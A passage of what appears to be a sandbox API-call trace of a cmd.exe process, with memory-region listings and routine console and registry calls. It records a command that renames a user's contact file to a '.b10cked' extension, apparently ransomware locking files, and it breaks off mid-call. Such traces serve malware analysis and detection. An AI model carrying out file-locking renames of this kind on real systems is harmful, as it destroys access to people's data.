32814 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 32815 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32984 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32985 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32986 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32987 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 32988 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 32989 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32990 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32991 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32992 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32993 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32994 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32995 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32996 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32997 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32998 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 32999 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33000 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33001 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 33002 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 33003 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 33004 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33005 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 33006 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 33007 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 773 os_tid = 0x8fc [0220.060] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12faec | out: lpSystemTimeAsFileTime=0x12faec*(dwLowDateTime=0xb7f6c300, dwHighDateTime=0x1d440a9)) [0220.060] GetCurrentProcessId () returned 0xf14 [0220.060] GetCurrentThreadId () returned 0x8fc [0220.060] GetTickCount () returned 0x3d6de [0220.060] QueryPerformanceCounter (in: lpPerformanceCount=0x12fae4 | out: lpPerformanceCount=0x12fae4*=27684933299) returned 1 [0220.061] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.061] __set_app_type (_Type=0x1) [0220.061] __p__fmode () returned 0x76b331f4 [0220.061] __p__commode () returned 0x76b331fc [0220.061] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.061] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.061] GetCurrentThreadId () returned 0x8fc [0220.061] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8fc) returned 0x38 [0220.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.061] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.061] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.061] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.061] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa7c | out: phkResult=0x12fa7c*=0x0) returned 0x2 [0220.062] VirtualQuery (in: lpAddress=0x12fab3, lpBuffer=0x12fa4c, dwLength=0x1c | out: lpBuffer=0x12fa4c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.062] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa4c, dwLength=0x1c | out: lpBuffer=0x12fa4c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.062] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa4c, dwLength=0x1c | out: lpBuffer=0x12fa4c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.062] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fa4c, dwLength=0x1c | out: lpBuffer=0x12fa4c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.062] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa4c, dwLength=0x1c | out: lpBuffer=0x12fa4c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.062] GetConsoleOutputCP () returned 0x1b5 [0220.062] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.062] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.062] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.062] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.062] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.062] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.062] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.062] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.062] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.062] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.063] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.063] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.063] GetEnvironmentStringsW () returned 0x320180* [0220.063] FreeEnvironmentStringsW (penv=0x320180) returned 1 [0220.063] GetEnvironmentStringsW () returned 0x320180* [0220.063] FreeEnvironmentStringsW (penv=0x320180) returned 1 [0220.063] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9ec | out: phkResult=0x12e9ec*=0x40) returned 0x0 [0220.063] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x0, lpData=0x12e9f8*=0xa8, lpcbData=0x12e9f0*=0x1000) returned 0x2 [0220.063] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x1, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.063] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x0, lpData=0x12e9f8*=0x1, lpcbData=0x12e9f0*=0x1000) returned 0x2 [0220.063] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x0, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.063] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x40, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.063] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x40, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x0, lpData=0x12e9f8*=0x40, lpcbData=0x12e9f0*=0x1000) returned 0x2 [0220.064] RegCloseKey (hKey=0x40) returned 0x0 [0220.064] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9ec | out: phkResult=0x12e9ec*=0x40) returned 0x0 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x0, lpData=0x12e9f8*=0x40, lpcbData=0x12e9f0*=0x1000) returned 0x2 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x1, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x0, lpData=0x12e9f8*=0x1, lpcbData=0x12e9f0*=0x1000) returned 0x2 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x0, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x9, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x9, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x0, lpData=0x12e9f8*=0x9, lpcbData=0x12e9f0*=0x1000) returned 0x2 [0220.064] RegCloseKey (hKey=0x40) returned 0x0 [0220.064] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.064] srand (_Seed=0x5b8863b6) [0220.064] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked\"" [0220.064] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked\"" [0220.064] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.064] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.065] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.065] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.065] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.065] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.065] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.065] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.065] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.065] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.065] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.065] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.065] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.065] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.065] GetEnvironmentStringsW () returned 0x3222d0* [0220.065] FreeEnvironmentStringsW (penv=0x3222d0) returned 1 [0220.065] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.065] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.065] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.065] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.065] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.065] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.065] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.065] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.065] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.065] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.065] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f7b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.065] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f7b8, lpFilePart=0x12f7b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f7b4*="Desktop") returned 0x18 [0220.065] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.066] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f534 | out: lpFindFileData=0x12f534) returned 0x320010 [0220.066] FindClose (in: hFindFile=0x320010 | out: hFindFile=0x320010) returned 1 [0220.066] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f534 | out: lpFindFileData=0x12f534) returned 0x320010 [0220.066] FindClose (in: hFindFile=0x320010 | out: hFindFile=0x320010) returned 1 [0220.066] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f534 | out: lpFindFileData=0x12f534) returned 0x320010 [0220.066] FindClose (in: hFindFile=0x320010 | out: hFindFile=0x320010) returned 1 [0220.066] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.066] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.066] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.066] GetEnvironmentStringsW () returned 0x322af0* [0220.066] FreeEnvironmentStringsW (penv=0x322af0) returned 1 [0220.066] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.067] GetConsoleOutputCP () returned 0x1b5 [0220.067] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.067] GetUserDefaultLCID () returned 0x409 [0220.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f8f8, cchData=128 | out: lpLCData="0") returned 2 [0220.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f8f8, cchData=128 | out: lpLCData="0") returned 2 [0220.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f8f8, cchData=128 | out: lpLCData="1") returned 2 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.068] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.069] GetConsoleTitleW (in: lpConsoleTitle=0x3108e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.069] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.069] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.069] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.069] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.070] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.070] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.070] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.070] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.070] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.070] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.070] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.072] GetConsoleTitleW (in: lpConsoleTitle=0x12f5f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.072] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.072] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.072] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.072] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.072] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.072] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.072] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.072] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.072] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.072] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.072] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.072] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.072] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.072] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.073] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.073] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.073] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.073] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.073] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.073] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.073] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.073] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.073] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.073] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.073] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.073] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.073] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.073] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.073] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.073] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.073] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.073] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.073] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.073] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.073] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.074] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.074] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.074] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f3ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f3a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f3a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.076] _wcsnicmp 